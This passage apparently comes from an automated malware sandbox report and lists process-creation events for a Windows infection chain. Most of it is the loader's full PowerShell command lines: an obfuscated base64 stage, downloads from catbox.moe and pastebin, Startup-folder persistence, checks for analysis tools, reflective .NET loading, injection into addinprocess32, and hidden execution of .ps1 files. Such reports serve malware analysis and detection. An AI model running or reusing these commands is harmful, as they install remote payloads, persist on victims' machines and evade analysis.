+ 'lAHgAdAAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZw' + [char]66 + 'dADoAOg' + [char]66 + 'VAFQARgA4ACAAOwAkAHkAaw' + [char]66 + 'oAHkAbgAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'GAGkAbA' + [char]66 + 'lACgAJA' + [char]66 + 'uAGcAcw' + [char]66 + 'kAHAALAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQAgACkAIAA7ACQAZg' + [char]66 + 'WAEQA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$LTkZZ = $host.Version.Major.Equals(2);If ( $LTkZZ ) {$fbKNY = ([System.IO.Path]::GetTempPath());del ($fbKNY + '\Upwin.msu');$ngsdp = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $EhgVw ) {$ngsdp = $menos ;}else {$ngsdp = ($ngsdp) ;};$ykhyn = ( New-Object Net.WebClient ) ;$ykhyn.Encoding = [System.Text.Encoding]::UTF8 ;$ykhyn.DownloadFile($ngsdp, ($fbKNY + '\Upwin.msu') ) ;$fVDsW = ( 'C:\Users\' + [Environment]::UserName );$bJTXj = ( $fbKNY + '\Upwin.msu' ) ; powershell.exe wusa.exe $bJTXj /quiet /norestart ; Copy-Item 'C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js' -Destination ( $fVDsW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$Stringbase;Function BaseMy{;$EATVh = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $EATVh;};$nhqvr = ('https://pastebin.com/raw/bYrRPs5M' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$vfjrD = $webClient.DownloadString( $nhqvr ) ;$Stringbase = $vfjrD; $vfjrD = BaseMy;$vfjrD | Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$lyjkG = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$BKrSR = New-Object System.Net.WebClient ;$BKrSR.Encoding = [System.Text.Encoding]::UTF8 ;$nFuQG = ( Get-Content -Path $cZNqf ) ;$lDMXc = $BKrSR.DownloadData( $nFuQG ) ;$SXRcf = [System.Text.Encoding]::UTF8.GetString($lDMXc);$SXRcf | Out-File -FilePath $lyjkG -force ;$EuTZA = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'') ;$ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$EuTZA += '[Byte[]] $EATVh = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$EuTZA += '[System.AppDomain]:' + ':CurrentDomain.Load( $EATVh ).' ;$EuTZA += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$EuTZA += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''txt.5202-YzX-dAeRpS-MeR/moc.seplaenohreruemed//:sptth'' , ''C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\addinprocess32'' ) );';$XvCTi = ([System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$EuTZA | Out-File -FilePath $XvCTi -force ;powershell -ExecutionPolicy Bypass -File $XvCTi ;};"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $WgkXZ = 'JA' + [char]66 + 'MAFQAaw' + [char]66 + 'aAFoAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQATA' + [char]66 + 'UAGsAWg' + [char]66 + 'aACAAKQAgAHsAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAA9ACAAKA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACkAOw' + [char]66 + 'kAGUAbAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQA7ACQAbg' + [char]66 + 'nAHMAZA' + [char]66 + 'wACAAPQAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGYAaQ' + [char]66 + 'sAGUAcwAuAGMAYQ' + [char]66 + '0AGIAbw' + [char]66 + '4AC4AbQ' + [char]66 + 'vAGUALw' + [char]66 + 'zAGEAaw' + [char]66 + '1AHUAbwAuAG0Acw' + [char]66 + '1ACcAOwAkAG0AZQ' + [char]66 + 'uAG8AcwAgAD0AIAAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + 'mAGkAbA' + [char]66 + 'lAHMALg' + [char]66 + 'jAGEAdA' + [char]66 + 'iAG8AeAAuAG0Abw' + [char]66 + 'lAC8ANg' + [char]66 + 'zAGQAag' + [char]66 + 'jADUALg' + [char]66 + 'tAHMAdQAnADsAJA' + [char]66 + 'FAGgAZw' + [char]66 + 'WAHcAIAA9ACAAJA' + [char]66 + 'lAG4AdgA6AFAAUg' + [char]66 + 'PAEMARQ' + [char]66 + 'TAFMATw' + [char]66 + 'SAF8AQQ' + [char]66 + 'SAEMASA' + [char]66 + 'JAFQARQ' + [char]66 + 'DAFQAVQ' + [char]66 + 'SAEUALg' + [char]66 + 'DAG8Abg' + [char]66 + '0AGEAaQ' + [char]66 + 'uAHMAKAAnADYANAAnACkAOw' + [char]66 + 'pAGYAIAAoACAAJA' + [char]66 + 'FAGgAZw' + [char]66 + 'WAHcAIAApACAAewAkAG4AZw' + [char]66 + 'zAGQAcAAgAD0AIAAkAG0AZQ' + [char]66 + 'uAG8AcwAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAG4AZw' + [char]66 + 'zAGQAcAAgAD0AIAAoACQAbg' + [char]66 + 'nAHMAZA' + [char]66 + 'wACkAIAA7AH0AOwAkAHkAaw' + [char]66 + 'oAHkAbgAgAD0AIAAoACAATg' + [char]66 + 'lAHcALQ' + [char]66 + 'PAGIAag' + [char]66 + 'lAGMAdAAgAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAIAApACAAOwAkAHkAaw' + [char]66 + 'oAHkAbgAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AVA' + [char]66 + 'lAHgAdAAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZw' + [char]66 + 'dADoAOg' + [char]66 + 'VAFQARgA4ACAAOwAkAHkAaw' + [char]66 + 'oAHkAbgAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'GAGkAbA' + [char]66 + 'lACgAJA' + [char]66 + 'uAGcAcw' + [char]66 + 'kAHAALAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQAgACkAIAA7ACQAZg' + [char]66 + 'WAEQA
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $WgkXZ = 'JA' + [char]66 + 'MAFQAaw' + [char]66 + 'aAFoAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQATA' + [char]66 + 'UAGsAWg' + [char]66 + 'aACAAKQAgAHsAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAA9ACAAKA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACkAOw' + [char]66 + 'kAGUAbAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQA7ACQAbg' + [char]66 + 'nAHMAZA' + [char]66 + 'wACAAPQAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGYAaQ' + [char]66 + 'sAGUAcwAuAGMAYQ' + [char]66 + '0AGIAbw' + [char]66 + '4AC4AbQ' + [char]66 + 'vAGUALw' + [char]66 + 'zAGEAaw' + [char]66 + '1AHUAbwAuAG0Acw' + [char]66 + '1ACcAOwAkAG0AZQ' + [char]66 + 'uAG8AcwAgAD0AIAAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + 'mAGkAbA' + [char]66 + 'lAHMALg' + [char]66 + 'jAGEAdA' + [char]66 + 'iAG8AeAAuAG0Abw' + [char]66 + 'lAC8ANg' + [char]66 + 'zAGQAag' + [char]66 + 'jADUALg' + [char]66 + 'tAHMAdQAnADsAJA' + [char]66 + 'FAGgAZw' + [char]66 + 'WAHcAIAA9ACAAJA' + [char]66 + 'lAG4AdgA6AFAAUg' + [char]66 + 'PAEMARQ' + [char]66 + 'TAFMATw' + [char]66 + 'SAF8AQQ' + [char]66 + 'SAEMASA' + [char]66 + 'JAFQARQ' + [char]66 + 'DAFQAVQ' + [char]66 + 'SAEUALg' + [char]66 + 'DAG8Abg' + [char]66 + '0AGEAaQ' + [char]66 + 'uAHMAKAAnADYANAAnACkAOw' + [char]66 + 'pAGYAIAAoACAAJA' + [char]66 + 'FAGgAZw' + [char]66 + 'WAHcAIAApACAAewAkAG4AZw' + [char]66 + 'zAGQAcAAgAD0AIAAkAG0AZQ' + [char]66 + 'uAG8AcwAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAG4AZw' + [char]66 + 'zAGQAcAAgAD0AIAAoACQAbg' + [char]66 + 'nAHMAZA' + [char]66 + 'wACkAIAA7AH0AOwAkAHkAaw' + [char]66 + 'oAHkAbgAgAD0AIAAoACAATg' + [char]66 + 'lAHcALQ' + [char]66 + 'PAGIAag' + [char]66 + 'lAGMAdAAgAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAIAApACAAOwAkAHkAaw' + [char]66 + 'oAHkAbgAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AVA' + [char]66 + 'lAHgAdAAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZw' + [char]66 + 'dADoAOg' + [char]66 + 'VAFQARgA4ACAAOwAkAHkAaw' + [char]66 + 'oAHkAbgAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'GAGkAbA' + [char]66 + 'lACgAJA' + [char]66 + 'uAGcAcw' + [char]66 + 'kAHAALAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQAgACkAIAA7ACQAZg' + [char]66 + 'WAEQA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$LTkZZ = $host.Version.Major.Equals(2);If ( $LTkZZ ) {$fbKNY = ([System.IO.Path]::GetTempPath());del ($fbKNY + '\Upwin.msu');$ngsdp = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $EhgVw ) {$ngsdp = $menos ;}else {$ngsdp = ($ngsdp) ;};$ykhyn = ( New-Object Net.WebClient ) ;$ykhyn.Encoding = [System.Text.Encoding]::UTF8 ;$ykhyn.DownloadFile($ngsdp, ($fbKNY + '\Upwin.msu') ) ;$fVDsW = ( 'C:\Users\' + [Environment]::UserName );$bJTXj = ( $fbKNY + '\Upwin.msu' ) ; powershell.exe wusa.exe $bJTXj /quiet /norestart ; Copy-Item 'C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js' -Destination ( $fVDsW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$Stringbase;Function BaseMy{;$EATVh = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $EATVh;};$nhqvr = ('https://pastebin.com/raw/bYrRPs5M' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$vfjrD = $webClient.DownloadString( $nhqvr ) ;$Stringbase = $vfjrD; $vfjrD = BaseMy;$vfjrD | Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$lyjkG = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$BKrSR = New-Object System.Net.WebClient ;$BKrSR.Encoding = [System.Text.Encoding]::UTF8 ;$nFuQG = ( Get-Content -Path $cZNqf ) ;$lDMXc = $BKrSR.DownloadData( $nFuQG ) ;$SXRcf = [System.Text.Encoding]::UTF8.GetString($lDMXc);$SXRcf | Out-File -FilePath $lyjkG -force ;$EuTZA = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'') ;$ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$EuTZA += '[Byte[]] $EATVh = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$EuTZA += '[System.AppDomain]:' + ':CurrentDomain.Load( $EATVh ).' ;$EuTZA += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$EuTZA += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''txt.5202-YzX-dAeRpS-MeR/moc.seplaenohreruemed//:sptth'' , ''C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\addinprocess32'' ) );';$XvCTi = ([System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$EuTZA | Out-File -FilePath $XvCTi -force ;powershell -ExecutionPolicy Bypass -File $XvCTi ;};"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$LTkZZ = $host.Version.Major.Equals(2);If ( $LTkZZ ) {$fbKNY = ([System.IO.Path]::GetTempPath());del ($fbKNY + '\Upwin.msu');$ngsdp = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $EhgVw ) {$ngsdp = $menos ;}else {$ngsdp = ($ngsdp) ;};$ykhyn = ( New-Object Net.WebClient ) ;$ykhyn.Encoding = [System.Text.Encoding]::UTF8 ;$ykhyn.DownloadFile($ngsdp, ($fbKNY + '\Upwin.msu') ) ;$fVDsW = ( 'C:\Users\' + [Environment]::UserName );$bJTXj = ( $fbKNY + '\Upwin.msu' ) ; powershell.exe wusa.exe $bJTXj /quiet /norestart ; Copy-Item 'C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js' -Destination ( $fVDsW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$Stringbase;Function BaseMy{;$EATVh = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $EATVh;};$nhqvr = ('https://pastebin.com/raw/bYrRPs5M' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$vfjrD = $webClient.DownloadString( $nhqvr ) ;$Stringbase = $vfjrD; $vfjrD = BaseMy;$vfjrD | Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$lyjkG = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$BKrSR = New-Object System.Net.WebClient ;$BKrSR.Encoding = [System.Text.Encoding]::UTF8 ;$nFuQG = ( Get-Content -Path $cZNqf ) ;$lDMXc = $BKrSR.DownloadData( $nFuQG ) ;$SXRcf = [System.Text.Encoding]::UTF8.GetString($lDMXc);$SXRcf | Out-File -FilePath $lyjkG -force ;$EuTZA = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'') ;$ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$EuTZA += '[Byte[]] $EATVh = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$EuTZA += '[System.AppDomain]:' + ':CurrentDomain.Load( $EATVh ).' ;$EuTZA += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$EuTZA += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''txt.5202-YzX-dAeRpS-MeR/moc.seplaenohreruemed//:sptth'' , ''C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\addinprocess32'' ) );';$XvCTi = ([System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$EuTZA | Out-File -FilePath $XvCTi -force ;powershell -ExecutionPolicy Bypass -File $XvCTi ;};"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\oqesy.ps1'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\wbhes.ps1'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\vogrr.ps1'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qdnjv.ps1'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\oqesy.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\wbhes.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\vogrr.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qdnjv.ps1"

              Persistence and Installation Behavior

              barindex
              Tries to download and execute files (via powershell)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$LTkZZ = $host.Version.Major.Equals(2);If ( $LTkZZ ) {$fbKNY = ([System.IO.Path]::GetTempPath());del ($fbKNY + '\Upwin.msu');$ngsdp = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $EhgVw ) {$ngsdp = $menos ;}else {$ngsdp = ($ngsdp) ;};$ykhyn = ( New-Object Net.WebClient ) ;$ykhyn.Encoding = [System.Text.Encoding]::UTF8 ;$ykhyn.DownloadFile($ngsdp, ($fbKNY + '\Upwin.msu') ) ;$fVDsW = ( 'C:\Users\' + [Environment]::UserName );$bJTXj = ( $fbKNY + '\Upwin.msu' ) ; powershell.exe wusa.exe $bJTXj /quiet /norestart ; Copy-Item 'C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js' -Destination ( $fVDsW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$Stringbase;Function BaseMy{;$EATVh = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $EATVh;};$nhqvr = ('https://pastebin.com/raw/bYrRPs5M' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$vfjrD = $webClient.DownloadString( $nhqvr ) ;$Stringbase = $vfjrD; $vfjrD = BaseMy;$vfjrD | Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$lyjkG = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$BKrSR = New-Object System.Net.WebClient ;$BKrSR.Encoding = [System.Text.Encoding]::UTF8 ;$nFuQG = ( Get-Content -Path $cZNqf ) ;$lDMXc = $BKrSR.DownloadData( $nFuQG ) ;$SXRcf = [System.Text.Encoding]::UTF8.GetString($lDMXc);$SXRcf | Out-File -FilePath $lyjkG -force ;$EuTZA = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'') ;$ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$EuTZA += '[Byte[]] $EATVh = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$EuTZA += '[System.AppDomain]:' + ':CurrentDomain.Load( $EATVh ).' ;$EuTZA += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$EuTZA += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''txt.5202-YzX-dAeRpS-MeR/moc.seplaenohreruemed//:sptth'' , ''C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\addinprocess32'' ) );';$XvCTi = ([System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$EuTZA | Out-File -FilePath $XvCTi -force ;powershell -ExecutionPolicy Bypass -File $XvCTi ;};"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$LTkZZ = $host.Version.Major.Equals(2);If ( $LTkZZ ) {$fbKNY = ([System.IO.Path]::GetTempPath());del ($fbKNY + '\Upwin.msu');$ngsdp = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $EhgVw ) {$ngsdp = $menos ;}else {$ngsdp = ($ngsdp) ;};$ykhyn = ( New-Object Net.WebClient ) ;$ykhyn.Encoding = [System.Text.Encoding]::UTF8 ;$ykhyn.DownloadFile($ngsdp, ($fbKNY + '\Upwin.msu') ) ;$fVDsW = ( 'C:\Users\' + [Environment]::UserName );$bJTXj = ( $fbKNY + '\Upwin.msu' ) ; powershell.exe wusa.exe $bJTXj /quiet /norestart ; Copy-Item 'C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js' -Destination ( $fVDsW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$Stringbase;Function BaseMy{;$EATVh = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $EATVh;};$nhqvr = ('https://pastebin.com/raw/bYrRPs5M' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$vfjrD = $webClient.DownloadString( $nhqvr ) ;$Stringbase = $vfjrD; $vfjrD = BaseMy;$vfjrD | Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$lyjkG = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$BKrSR = New-Object System.Net.WebClient ;$BKrSR.Encoding = [System.Text.Encoding]::UTF8 ;$nFuQG = ( Get-Content -Path $cZNqf ) ;$lDMXc = $BKrSR.DownloadData( $nFuQG ) ;$SXRcf = [System.Text.Encoding]::UTF8.GetString($lDMXc);$SXRcf | Out-File -FilePath $lyjkG -force ;$EuTZA = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'') ;$ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$EuTZA += '[Byte[]] $EATVh = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$EuTZA += '[System.AppDomain]:' + ':CurrentDomain.Load( $EATVh ).' ;$EuTZA += 'GetType( ''ClassLibrary3.Class1'' ).GetM' 